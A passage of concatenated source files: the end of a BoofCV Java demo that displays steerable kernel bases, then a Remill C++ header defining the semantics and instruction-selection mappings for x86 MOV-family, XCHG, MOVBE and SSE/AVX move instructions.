addAlgorithm("Deriv XYYY", new DisplayGaussianKernelApp.DerivType(1, 3));
JPanel content = new JPanel(new GridLayout(0, 2));
content.add(basisPanel);
content.add(steerPanel);
setMainGUI(content);
}
protected abstract SteerableKernel<K> createKernel( int orderX, int orderY );
@Override
public void setActiveAlgorithm( String name, Object cookie ) {
DisplayGaussianKernelApp.DerivType dt = (DisplayGaussianKernelApp.DerivType)cookie;
// add basis
SteerableKernel<K> steerable = createKernel(dt.orderX, dt.orderY);
basisPanel.reset();
for (int i = 0; i < steerable.getBasisSize(); i++) {
T smallImg = GKernelMath.convertToImage(steerable.getBasis(i));
new FDistort(smallImg, largeImg).scaleExt().interpNN().apply();
double maxValue = GImageStatistics.maxAbs(largeImg);
BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue);
basisPanel.addImage(out, "Basis " + i);
}
// add steered kernels
steerPanel.reset();
for (int i = 0; i <= 20; i++) {
double angle = Math.PI*i/20.0;
K kernel = steerable.compute(angle);
T smallImg = GKernelMath.convertToImage(kernel);
new FDistort(smallImg, largeImg).scaleExt().interpNN().apply();
double maxValue = GImageStatistics.maxAbs(largeImg);
BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue);
steerPanel.addImage(out, String.format("%5d", (int)(180.0*angle/Math.PI)));
}
repaint();
}
}
| lessthanoptimal/BoofCV | demonstrations/src/main/java/boofcv/demonstrations/imageprocessing/DisplaySteerableBase.java | Java | apache-2.0 | 4,148 |
/*
* Copyright (c) 2017 Trail of Bits, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
namespace {
template <typename D, typename S>
DEF_SEM(MOV, D dst, const S src) {
WriteZExt(dst, Read(src));
return memory;
}
template <typename D1, typename S1, typename D2, typename S2>
DEF_SEM(XCHG, D1 dst, S1 dst_val, D2 src, S2 src_val) {
auto old_dst = Read(dst_val);
auto old_src = Read(src_val);
WriteZExt(dst, old_src);
WriteZExt(src, old_dst);
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVBE16, D dst, const S src) {
WriteZExt(dst, __builtin_bswap16(Read(src)));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVBE32, D dst, const S src) {
WriteZExt(dst, __builtin_bswap32(Read(src)));
return memory;
}
#if 64 == ADDRESS_SIZE_BITS
template <typename D, typename S>
DEF_SEM(MOVBE64, D dst, const S src) {
Write(dst, __builtin_bswap64(Read(src)));
return memory;
}
#endif
template <typename D, typename S>
DEF_SEM(MOVQ, D dst, S src) {
UWriteV64(dst, UExtractV64(UReadV64(src), 0));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVD, D dst, S src) {
UWriteV32(dst, UExtractV32(UReadV32(src), 0));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVxPS, D dst, S src) {
FWriteV32(dst, FReadV32(src));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVxPD, D dst, S src) {
FWriteV64(dst, FReadV64(src));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVDQx, D dst, S src) {
UWriteV128(dst, UReadV128(src));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVLPS, D dst, S src) {
auto src_vec = FReadV32(src);
auto low1 = FExtractV32(src_vec, 0);
auto low2 = FExtractV32(src_vec, 1);
FWriteV32(dst, FInsertV32(FInsertV32(FReadV32(dst), 0, low1), 1, low2));
return memory;
}
DEF_SEM(MOVLHPS, V128W dst, V128 src) {
auto res = FReadV32(dst);
auto src1 = FReadV32(src);
res = FInsertV32(res, 2, FExtractV32(src1, 0));
res = FInsertV32(res, 3, FExtractV32(src1, 1));
FWriteV32(dst, res);
return memory;
}
DEF_SEM(MOVHLPS, V128W dst, V128 src) {
auto res = FReadV32(dst);
auto src1 = FReadV32(src);
res = FInsertV32(res, 0, FExtractV32(src1, 2));
res = FInsertV32(res, 1, FExtractV32(src1, 3));
FWriteV32(dst, res);
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVLPD, D dst, S src) {
FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0)));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVLPS, VV128W dst, V128 src1, MV64 src2) {
auto low_vec = FReadV32(src2);
FWriteV32(
dst, FInsertV32(FInsertV32(FReadV32(src1), 0, FExtractV32(low_vec, 0)), 1,
FExtractV32(low_vec, 1)));
return memory;
}
DEF_SEM(VMOVLPD, VV128W dst, V128 src1, MV64 src2) {
FWriteV64(dst, FInsertV64(FReadV64(src1), 0, FExtractV64(FReadV64(src2), 0)));
return memory;
}
DEF_SEM(VMOVLHPS, VV128W dst, V128 src1, V128 src2) {
/* DEST[63:0] ← SRC1[63:0] */
/* DEST[127:64] ← SRC2[63:0] */
/* DEST[VLMAX-1:128] ← 0 */
auto src1_vec = FReadV32(src1);
auto src2_vec = FReadV32(src2);
float32v4_t temp_vec = {};
temp_vec = FInsertV32(temp_vec, 0, FExtractV32(src1_vec, 0));
temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src1_vec, 1));
temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src2_vec, 0));
temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src2_vec, 1));
FWriteV32(dst, temp_vec);
return memory;
}
DEF_SEM(VMOVHLPS, VV128W dst, V128 src1, V128 src2) {
auto src1_vec = FReadV32(src1);
auto src2_vec = FReadV32(src2);
float32v4_t temp_vec = {};
temp_vec = FInsertV32(temp_vec, 0, FExtractV32(src2_vec, 2));
temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src2_vec, 3));
temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src1_vec, 2));
temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src1_vec, 3));
FWriteV32(dst, temp_vec);
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
// Fused `CALL $0; POP reg` sequences.
DEF_ISEL(CALL_POP_FUSED_32) = MOV<R32W, I32>;
DEF_ISEL(CALL_POP_FUSED_64) = MOV<R64W, I64>;
DEF_ISEL(MOV_GPR8_IMMb_C6r0) = MOV<R8W, I8>;
DEF_ISEL(MOV_MEMb_IMMb) = MOV<M8W, I8>;
DEF_ISEL_RnW_In(MOV_GPRv_IMMz, MOV);
DEF_ISEL_MnW_In(MOV_MEMv_IMMz, MOV);
DEF_ISEL(MOVBE_GPRv_MEMv_16) = MOVBE16<R16W, M16>;
DEF_ISEL(MOVBE_GPRv_MEMv_32) = MOVBE32<R32W, M32>;
IF_64BIT(DEF_ISEL(MOVBE_GPRv_MEMv_64) = MOVBE64<R64W, M64>;)
DEF_ISEL(MOV_GPR8_GPR8_88) = MOV<R8W, R8>;
DEF_ISEL(MOV_MEMb_GPR8) = MOV<M8W, R8>;
DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv, MOV);
DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_89, MOV);
DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_8B, MOV);
DEF_ISEL(MOV_GPR8_MEMb) = MOV<R8W, M8>;
DEF_ISEL(MOV_GPR8_GPR8_8A) = MOV<R8W, R8>;
DEF_ISEL_RnW_Mn(MOV_GPRv_MEMv, MOV);
DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv_8B, MOV);
DEF_ISEL(MOV_AL_MEMb) = MOV<R8W, M8>;
DEF_ISEL_RnW_Mn(MOV_OrAX_MEMv, MOV);
DEF_ISEL(MOV_MEMb_AL) = MOV<M8W, R8>;
DEF_ISEL_MnW_Rn(MOV_MEMv_OrAX, MOV);
DEF_ISEL(MOV_GPR8_IMMb_D0) = MOV<R8W, I8>;
DEF_ISEL(MOV_GPR8_IMMb_B0) =
MOV<R8W, I8>; // https://github.com/intelxed/xed/commit/906d25
DEF_ISEL_RnW_In(MOV_GPRv_IMMv, MOV);
DEF_ISEL(MOVNTI_MEMd_GPR32) = MOV<M32W, R32>;
IF_64BIT(DEF_ISEL(MOVNTI_MEMq_GPR64) = MOV<M64W, R64>;)
DEF_ISEL(XCHG_MEMb_GPR8) = XCHG<M8W, M8, R8W, R8>;
DEF_ISEL(XCHG_GPR8_GPR8) = XCHG<R8W, R8, R8W, R8>;
DEF_ISEL_MnW_Mn_RnW_Rn(XCHG_MEMv_GPRv, XCHG);
DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_GPRv, XCHG);
DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_OrAX, XCHG);
DEF_ISEL(MOVQ_MMXq_MEMq_0F6E) = MOVQ<V64W, MV64>;
DEF_ISEL(MOVQ_MMXq_GPR64) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_MEMq_MMXq_0F7E) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_GPR64_MMXq) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_MMXq_MEMq_0F6F) = MOVQ<V64W, MV64>;
DEF_ISEL(MOVQ_MMXq_MMXq_0F6F) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_MEMq_MMXq_0F7F) = MOVQ<MV64W, V64>;
DEF_ISEL(MOVQ_MMXq_MMXq_0F7F) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_XMMdq_MEMq_0F6E) = MOVQ<V128W, MV64>;
IF_64BIT(DEF_ISEL(MOVQ_XMMdq_GPR64) = MOVQ<V128W, V64>;)
DEF_ISEL(MOVQ_MEMq_XMMq_0F7E) = MOVQ<MV64W, V128>;
IF_64BIT(DEF_ISEL(MOVQ_GPR64_XMMq) = MOVQ<V64W, V128>;)
DEF_ISEL(MOVQ_MEMq_XMMq_0FD6) = MOVQ<MV64W, V128>;
DEF_ISEL(MOVQ_XMMdq_XMMq_0FD6) = MOVQ<V128W, V128>;
DEF_ISEL(MOVQ_XMMdq_MEMq_0F7E) = MOVQ<V128W, MV64>;
DEF_ISEL(MOVQ_XMMdq_XMMq_0F7E) = MOVQ<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVQ_XMMdq_MEMq_6E) = MOVQ<VV128W, MV64>;
IF_64BIT(DEF_ISEL(VMOVQ_XMMdq_GPR64q) = MOVQ<VV128W, V64>;)
DEF_ISEL(VMOVQ_MEMq_XMMq_7E) = MOVQ<MV64W, V128>;
IF_64BIT(DEF_ISEL(VMOVQ_GPR64q_XMMq) = MOVQ<V64W, V128>;)
DEF_ISEL(VMOVQ_XMMdq_MEMq_7E) = MOVQ<VV128W, MV64>;
DEF_ISEL(VMOVQ_XMMdq_XMMq_7E) = MOVQ<VV128W, V128>;
DEF_ISEL(VMOVQ_MEMq_XMMq_D6) = MOVQ<MV64W, V128>;
DEF_ISEL(VMOVQ_XMMdq_XMMq_D6) = MOVQ<VV128W, V128>;
# if HAS_FEATURE_AVX512
DEF_ISEL(VMOVQ_XMMu64_MEMu64_AVX512) = MOVQ<VV128W, MV64>;
IF_64BIT(DEF_ISEL(VMOVQ_GPR64u64_XMMu64_AVX512) = MOVQ<V64W, V128>;)
IF_64BIT(DEF_ISEL(VMOVQ_XMMu64_GPR64u64_AVX512) = MOVQ<VV128W, V64>;)
DEF_ISEL(VMOVQ_XMMu64_XMMu64_AVX512) = MOVQ<VV128W, V128>;
DEF_ISEL(VMOVQ_MEMu64_XMMu64_AVX512) = MOVQ<MV64W, V128>;
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVD_MMXq_MEMd) = MOVD<V32W, MV32>;
DEF_ISEL(MOVD_MMXq_GPR32) = MOVD<V32W, V32>;
DEF_ISEL(MOVD_MEMd_MMXd) = MOVD<MV32W, V32>;
DEF_ISEL(MOVD_GPR32_MMXd) = MOVD<V32W, V32>;
DEF_ISEL(MOVD_XMMdq_MEMd) = MOVD<V128W, MV32>;
DEF_ISEL(MOVD_XMMdq_GPR32) = MOVD<V128W, V32>; // Zero extends.
DEF_ISEL(MOVD_MEMd_XMMd) = MOVD<MV32W, V128>;
DEF_ISEL(MOVD_GPR32_XMMd) = MOVD<V32W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVD_XMMdq_MEMd) = MOVD<VV128W, MV32>;
DEF_ISEL(VMOVD_XMMdq_GPR32d) = MOVD<VV128W, V32>;
DEF_ISEL(VMOVD_MEMd_XMMd) = MOVD<MV32W, V128>;
DEF_ISEL(VMOVD_GPR32d_XMMd) = MOVD<V32W, V128>;
# if HAS_FEATURE_AVX512
DEF_ISEL(VMOVD_XMMu32_MEMu32_AVX512) = MOVD<VV128W, MV32>;
DEF_ISEL(VMOVD_XMMu32_GPR32u32_AVX512) = MOVD<VV128W, V32>;
DEF_ISEL(VMOVD_MEMu32_XMMu32_AVX512) = MOVD<MV32W, V128>;
DEF_ISEL(VMOVD_GPR32u32_XMMu32_AVX512) = MOVD<V32W, V128>;
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVAPS_XMMps_MEMps) = MOVxPS<V128W, MV128>;
DEF_ISEL(MOVAPS_XMMps_XMMps_0F28) = MOVxPS<V128W, V128>;
DEF_ISEL(MOVAPS_MEMps_XMMps) = MOVxPS<MV128W, V128>;
DEF_ISEL(MOVAPS_XMMps_XMMps_0F29) = MOVxPS<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVAPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>;
DEF_ISEL(VMOVAPS_XMMdq_XMMdq_28) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVAPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>;
DEF_ISEL(VMOVAPS_XMMdq_XMMdq_29) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVAPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>;
DEF_ISEL(VMOVAPS_YMMqq_YMMqq_28) = MOVxPS<VV256W, VV256>;
DEF_ISEL(VMOVAPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>;
DEF_ISEL(VMOVAPS_YMMqq_YMMqq_29) = MOVxPS<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//4102 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4103 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4104 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4105 VMOVAPS VMOVAPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4106 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4107 VMOVAPS VMOVAPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4108 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4109 VMOVAPS VMOVAPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4110 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4111 VMOVAPS VMOVAPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4112 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4113 VMOVAPS VMOVAPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTPS_MEMdq_XMMps) = MOVxPS<MV128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVNTPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>;
DEF_ISEL(VMOVNTPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>;
# if HAS_FEATURE_AVX512
//6168 VMOVNTPS VMOVNTPS_MEMf32_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6169 VMOVNTPS VMOVNTPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6170 VMOVNTPS VMOVNTPS_MEMf32_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVUPS_XMMps_MEMps) = MOVxPS<V128W, MV128>;
DEF_ISEL(MOVUPS_XMMps_XMMps_0F10) = MOVxPS<V128W, V128>;
DEF_ISEL(MOVUPS_MEMps_XMMps) = MOVxPS<MV128W, V128>;
DEF_ISEL(MOVUPS_XMMps_XMMps_0F11) = MOVxPS<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVUPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>;
DEF_ISEL(VMOVUPS_XMMdq_XMMdq_10) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVUPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>;
DEF_ISEL(VMOVUPS_XMMdq_XMMdq_11) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVUPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>;
DEF_ISEL(VMOVUPS_YMMqq_YMMqq_10) = MOVxPS<VV256W, VV256>;
DEF_ISEL(VMOVUPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>;
DEF_ISEL(VMOVUPS_YMMqq_YMMqq_11) = MOVxPS<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//4954 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4955 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4956 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4957 VMOVUPS VMOVUPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4958 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4959 VMOVUPS VMOVUPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4960 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4961 VMOVUPS VMOVUPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4962 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4963 VMOVUPS VMOVUPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4964 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4965 VMOVUPS VMOVUPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVAPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>;
DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F28) = MOVxPD<V128W, V128>;
DEF_ISEL(MOVAPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>;
DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F29) = MOVxPD<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVAPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>;
DEF_ISEL(VMOVAPD_XMMdq_XMMdq_28) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVAPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>;
DEF_ISEL(VMOVAPD_XMMdq_XMMdq_29) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVAPD_YMMqq_MEMqq) = MOVxPD<VV256W, MV256>;
DEF_ISEL(VMOVAPD_YMMqq_YMMqq_28) = MOVxPD<VV256W, VV256>;
DEF_ISEL(VMOVAPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>;
DEF_ISEL(VMOVAPD_YMMqq_YMMqq_29) = MOVxPD<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//5585 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//5586 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5587 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//5588 VMOVAPD VMOVAPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5589 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//5590 VMOVAPD VMOVAPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5591 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//5592 VMOVAPD VMOVAPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5593 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5594 VMOVAPD VMOVAPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5595 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5596 VMOVAPD VMOVAPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTPD_MEMdq_XMMpd) = MOVxPD<MV128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVNTPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>;
DEF_ISEL(VMOVNTPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>;
# if HAS_FEATURE_AVX512
//6088 VMOVNTPD VMOVNTPD_MEMf64_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6089 VMOVNTPD VMOVNTPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6090 VMOVNTPD VMOVNTPD_MEMf64_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVUPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>;
DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F10) = MOVxPD<V128W, V128>;
DEF_ISEL(MOVUPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>;
DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F11) = MOVxPD<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVUPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>;
DEF_ISEL(VMOVUPD_XMMdq_XMMdq_10) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVUPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>;
DEF_ISEL(VMOVUPD_XMMdq_XMMdq_11) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVUPD_YMMqq_MEMqq) = MOVxPD<VV256W, MV256>;
DEF_ISEL(VMOVUPD_YMMqq_YMMqq_10) = MOVxPD<VV256W, VV256>;
DEF_ISEL(VMOVUPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>;
DEF_ISEL(VMOVUPD_YMMqq_YMMqq_11) = MOVxPD<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//4991 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4992 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4993 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4994 VMOVUPD VMOVUPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4995 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4996 VMOVUPD VMOVUPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
